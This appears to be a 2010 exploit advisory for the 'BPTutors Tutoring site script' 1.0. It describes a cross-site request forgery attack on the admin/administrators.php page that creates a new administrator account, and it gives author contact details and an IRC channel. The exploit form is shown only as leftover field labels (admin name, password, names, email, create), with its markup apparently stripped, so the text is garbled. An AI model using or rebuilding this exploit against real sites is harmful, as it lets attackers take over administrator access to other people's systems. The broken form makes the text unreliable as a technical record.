# Title: BPTutors Tutoring site script - [ CSRF ] Create Administrator Account # Date: 26/3/2010 # Author: bi0 # Software: http://bpowerhouse.info/tutoring-site-script.htm # Version: 1.0 # Code : ______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] BPTutors Tutoring site script - [ CSRF ] Create Administrator Account # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Thanks: 2 all my friends !! # [x] IRC : irc.clickshqip.com / #itsecurity # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # [ CSRF ] # # [ Login ] # http://[localhost]/[path]/admin/administrators.php # # // Start CSRF |-------------------------------------------------------------------------------| Admin ( 6+)
Passwd (6+)
Frist Name
Last Name
Email
Create |-------------------------------------------------------------------------------| # // End of attack # [#]------------------------------------------------------------------------------------------[#] #EOF